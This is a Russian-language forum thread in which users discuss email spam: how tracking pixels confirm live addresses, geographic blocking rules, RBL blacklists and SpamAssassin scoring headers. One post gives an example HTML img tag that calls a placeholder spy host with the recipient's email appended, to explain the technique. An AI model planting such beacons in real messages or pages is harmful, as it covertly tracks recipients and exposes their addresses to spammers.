хитро№;%ый СПАМ, ЯХА бессильна :(...

User avatar
A. Fig Lee
Уже с Приветом
Posts: 12072
Joined: 17 Nov 2002 03:41
Location: английская колония

Post by A. Fig Lee »

DmitryMA wrote:1. Разъясните про пиксель и IP по-подробнее. И что даст спамеру мой IP?

Задача - убедится, что емейл рабочий. Средствами обычного ХТМЛ. Включаем в пейдж.

Code: Select all

<img src="http://www.evihacker.com/spy_image.gif?email=dmitriyma">

Как только DmitriyMA откроет етот емейл - даже в превиев моде, Аутлук, чтоб показать HTML сдаунлодит етот имейдж. Я посмотрю вебсервер лог и увижу, что был запрос на етот имейдж - значит DmitriyMA его посмотрел и емейл правильный.
DmitriyMA ничего не обнаружит потому что имейдж прозрачный, размер 1х1 пиксель.

2. fastmail.fm действительно позволяет использовать black-lists, но я говорил не о них. Вы сами создаете свои собственные rules (все провайдеры, в т.ч. hotmail and yahoo это позволяют), с помощью которых блокируете целые географические зоны (а вот этого вы не сможете сделать с помощью фильтроя Яги или hotmail). Классические black-lists этого не делают. Например, если у вас нет знакомых/друзей в Китае, то вы прикрывате весь траффик из Китая (не важно, спам или нет). В то же время, какой нибудь Ли Си Цин закроет таким же образом траффик из России. И это все на уровне конечного пользователя !!! Т.е. в конце концов вся информация, возможно, и вписывается в sendmail, но она никак не зависит от black-lists сервисов (которые подвергаются ДОС-атакам). И что тут трудного :pain1:

А, ето можно конечно.
Не очень еффективно, ИМХО. Как правило, если у Вас много друзей в России, то и спам Вам будет приходить в основном из России, а не Китая.
А вообще - главный спам идет из USA.
http://www.mailutilities.com/news/2318.html
Гдето видел более обширные исследования..
Верить нельзя никому - даже себе. Мне - можно!
Frank
Уже с Приветом
Posts: 2019
Joined: 22 Jul 2000 09:01

Post by Frank »

1. Если сообщение содержит только картинку, то это будет сообщение в чистом HTML, а такие сообщения несложно идентифицировать и помечать как спам.

2. Русские правила можно и самому придумать, например, давать большие очки сообщениям в windows-1251.

3. При использовании SpamAssassin и подобных программ сообщения автоматически не откидываются сервером (хотя, при желании это тоже можно сделать). Он просто добавляет заголовки:
X-Spam-Status: Yes, hits=8.0 required=5.0
X-Spam-Level: ********

Потом пользователь в своей нормальной почтовой программе типа The Bat может фильтровать сообщения по этим заголовкам, помещая, например, их в отдельную папку для спама, которую может иногда просматривать на наличие случайных срабатываний.

4. Удобство программ вроде SpamAssassin в том, что они используют много тестов, в том числе и проверяют разные blacklist, потом суммируя очки, но не откидывая письма сразу в случае с чистым rbl.

С другой стороны, провайдер получает письмо и может платить за входящий траффик. Для какого-нибудь деревенского провайдера это может выливаться в непозволительно большие деньги, и он понатыкает связку самых жёстких rbl.

А некоторые rbl в случае проблем с провайдером любят включать в список и все сетки вышестоящего провайдера. Ему-то что, они ни за что не отвечает.
User avatar
A. Fig Lee
Уже с Приветом
Posts: 12072
Joined: 17 Nov 2002 03:41
Location: английская колония

Post by A. Fig Lee »

Frank wrote:1. Если сообщение содержит только картинку, то это будет сообщение в чистом HTML, а такие сообщения несложно идентифицировать и помечать как спам.



Не только картинку. Еще предложение покупать Виагру.
2. Не обязательно чистый ХТМЛ - может быть малтипарт/альтернейтив.
3. Довольно много людей посылают емейл в ХТМЛ формате.
Верить нельзя никому - даже себе. Мне - можно!
Frank
Уже с Приветом
Posts: 2019
Joined: 22 Jul 2000 09:01

Post by Frank »

Ну и что? Можно ведь всегда придумать подпрограммку, которая вычисляет, что текст в HTML и там только картинка. Во всяком случае, спам часто отличается от нормальных сообщений.

Уже по этим заголовкам в письме можно словить кучу русского спама. Русские спаммеры часто пользуются программой, которая их лепит. Попробуйте посмотреть заголовки в полученных письмах.
References: <EB332D2896AB21BD@xxxxx.ru>
In-Reply-To: <EB332D2896AB21BD@xxxxx.ru>

Те, кто шлёт письма в html, рискуют тем, что их послания просто не прочитают, если они уйдут в спамовскую папку. Любой сейчас может сказать, что ему приходит море спама и он просто не заметил их сообщения.

Антиспамовские программы ведь служат в основном для того, чтобы отделить нормальные письма, которые требуют срочного ответа. Если твоё письмо не отличается от спама и на него нет ответа, это сугубо твои личные проблемы.
User avatar
A. Fig Lee
Уже с Приветом
Posts: 12072
Joined: 17 Nov 2002 03:41
Location: английская колония

Post by A. Fig Lee »

Frank wrote:
1. Если сообщение содержит только картинку, то это будет сообщение в чистом HTML, а такие сообщения несложно идентифицировать и помечать как спам.


A. Fig Lee wrote:
Не только картинку. Еще предложение покупать Виагру.

Frank wrote:Ну и что? Можно ведь всегда придумать подпрограммку, которая вычисляет, что текст в HTML и там только картинка.


:pain1: :pain1: :pain1:

Те, кто шлёт письма в html, рискуют тем, что их послания просто не прочитают, если они уйдут в спамовскую папку. Любой сейчас может сказать, что ему приходит море спама и он просто не заметил их сообщения.


А... Так ето рекрутеров проблема, что их сообщения о позициях в спам пойдут... И джоб офферы от компаний. Не наша... :?
Верить нельзя никому - даже себе. Мне - можно!
User avatar
Gennadiy
Уже с Приветом
Posts: 11332
Joined: 30 Mar 2000 10:01
Location: Ice Storm Town

Post by Gennadiy »

Return to “Вопросы и новости IT”